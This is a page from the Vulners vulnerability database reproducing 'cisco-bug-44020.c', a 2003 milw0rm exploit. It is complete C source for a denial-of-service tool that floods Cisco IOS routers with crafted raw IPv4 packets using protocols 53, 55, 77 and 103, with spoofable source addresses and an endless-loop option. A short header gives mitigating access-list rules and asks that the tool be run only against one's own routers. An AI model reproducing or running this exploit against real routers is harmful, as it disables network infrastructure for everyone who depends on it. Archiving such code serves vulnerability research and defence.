Vulners
Lucene search
Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service
/*******************************************************/
/* cisco-bug-44020.c - Copyright by Martin Kluge ([email protected]) */
/* */
/* Feel free to modify this code as you like, as long as you include */
/* the above copyright statement. */
/* */
/* Please use this code only to check your OWN cisco routers. */
/* */
/* */
/* This exploit uses the bug in recent IOS versions to stop router */
/* from processing traffic once the input queue is full. */
/* */
/* */
/* Use access control lists as described in the CISCO advisory to */
/* protect your cisco routers: */
/* */
/* access-list 101 deny 53 any any */
/* access-list 101 deny 55 any any */
/* access-list 101 deny 77 any any */
/* access-list 101 deny 103 any any */
/* */
/* This code was only tested on linux, no warranty is or will be */
/* */
/* Usage: ./cisco-bug-44020 <src ip> <dst ip> <hops> <number> */
/* Source IP: Your source IP (or a spoofed source IP) */
/* Destination IP: The IP of the vulnerable cisco router */
/* Hops: The number of hops between you and the router, */
/* the time to live (ttl) should be 0 when the packet */
/* is received by the cisco router. */
/* Number: Number of packets to send (0 = loop) */
/* provided. */
/*******************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#define DEBUG
#ifndef IPPROTO_RAW
#define IPPROTO_RAW 0
#endif
/* IPv4 header */
struct ipv4_pkt_header {
unsigned int ipvhl:8; /* Version + Header length */
unsigned int type_service:8; /* TOS(Type of Service) field */
unsigned short packet_len; /* Header+Payload length */
unsigned short ident; /* Identification field */
unsigned short fragment; /* Fragment Offset field */
unsigned int time_live:8; /* TTL(Time to Live) field */
unsigned int protocol:8; /* Protocol field */
unsigned short sum; /* Checksum field */
struct in_addr src_ip; /* Source IP */
struct in_addr dst_ip; /* Destination IP */
};
char proto[] = {53,55,77,103};
/* Prototypes */
int in_cksum (unsigned short *, int, int);
/* Main function */
int main (int argc, char *argv[]) {
struct ipv4_pkt_header ipv4_hdr;
struct sockaddr_in sin;
struct timeval seed;
unsigned long src_ip, dst_ip;
int fd, hops, count, bytes;
int len=0, i=0, n=0, loop=0;
unsigned char *buf;
/* Check command line args */
if(argc != 5) {
fprintf(stderr, "Usage: %s <src ip> <dst ip> <hops> <number>\n\n", argv[0]);
return(EXIT_FAILURE);
}
src_ip = inet_addr(argv[1]);
dst_ip = inet_addr(argv[2]);
hops = atoi(argv[3]);
count = atoi(argv[4]);
if(count == 0) { loop=1; count=1; }
#ifdef DEBUG
printf("DEBUG: Hops: %i\n", hops);
#endif
/* Open a raw socket */
if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
fprintf(stderr, "Error: Cannot open raw socket.\n");
return(EXIT_FAILURE);
}
/* Build the IPv4 header */
ipv4_hdr.ipvhl = ((4 << 4) | 0x0f) & (5 | 0xf0); /* :) */
ipv4_hdr.type_service = 0x10;
#ifdef OSTYPE_BSD
ipv4_hdr.packet_len = 0x14 + len;
ipv4_hdr.fragment = 0x4000;
#else
ipv4_hdr.packet_len = htons(0x14 + len);
ipv4_hdr.fragment = htons(0x4000);
#endif
ipv4_hdr.time_live = hops;
ipv4_hdr.src_ip.s_addr = src_ip;
ipv4_hdr.dst_ip.s_addr = dst_ip;
while(n < count) {
/* Seed the random generator */
if(gettimeofday(&seed, NULL) == -1) {
fprintf(stderr, "Error: Cannot seed the random generator.\n");
return(EXIT_FAILURE);
}
srandom((unsigned int) (seed.tv_sec ^ seed.tv_usec));
ipv4_hdr.protocol = proto[random() % 0x4];
#ifdef DEBUG
printf("DEBUG: Protocol: %i\n", ipv4_hdr.protocol);
#endif
ipv4_hdr.ident = htons(random() % 0x7fff);
/* Calculate checksum */
ipv4_hdr.sum = 0x0000;
ipv4_hdr.sum = in_cksum((unsigned short *) &ipv4_hdr, 0x14 + len, 0);
#ifdef DEBUG
printf("DEBUG: Checksum: %i\n", ipv4_hdr.sum);
#endif
buf = malloc(0x14 + len);
memset(buf, '\0', 0x14 + len);
memcpy((unsigned char *) buf, (unsigned char *) &ipv4_hdr,
0x14 + len);
#ifdef DEBUG
printf("DEBUG: ");
for(i=0; i < 0x14 + len; i++)
printf(" %02x", buf[i]);
printf("\n");
#endif
memset(&sin, '\0', sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = dst_ip;
bytes = sendto(fd, buf, 0x14 + len, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr));
#ifdef DEBUG
printf("DEBUG: Wrote %i bytes.\n", bytes);
#endif
if(loop != 1) n++;
free(buf);
}
close(fd);
return(EXIT_SUCCESS);
}
int in_cksum(unsigned short *addr, int len, int csum) {
register int sum = csum;
unsigned short answer = 0;
register unsigned short *w = addr;
register int nleft = len;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
sum += htons(*(unsigned char *)w<<8);
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
// milw0rm.com [2003-07-21]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jul 2003 00:00Current
7.4High risk
Vulners AI Score7.4